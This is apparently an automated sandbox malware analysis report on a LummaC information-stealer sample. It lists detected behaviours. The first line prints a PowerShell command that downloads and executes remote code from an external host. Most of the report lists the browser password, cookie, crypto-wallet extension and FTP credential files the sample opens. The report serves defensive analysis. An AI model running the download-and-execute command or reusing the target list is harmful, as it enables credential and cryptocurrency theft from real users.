      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; Jump to behavior
      Source: Ted.com, 0000000B.00000000.1730098930.00000000006F3000.00000002.00000001.01000000.00000007.sdmp, Ted.com.1.dr, Remarkable.8.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TrayNotifyWndShell_TrayWndU
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SHELL_TRAYWND
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndtooltips_class32SV
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndU
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROGMAN
      Source: vsv_tool.exe, 00000031.00000000.2877011573.0000000000821000.00000020.00000001.01000000.0000000F.sdmp, vsv_tool.exe, 00000031.00000002.2943800444.0000000004D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SHELL_TRAYWNDU
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeQueries volume information: C:\Users\user\AppData\Local\Temp\41b5d0bf VolumeInformation
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: find.exe, 00000028.00000002.2822701970.000001CE23600000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000028.00000002.2822649388.000001CE2329B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
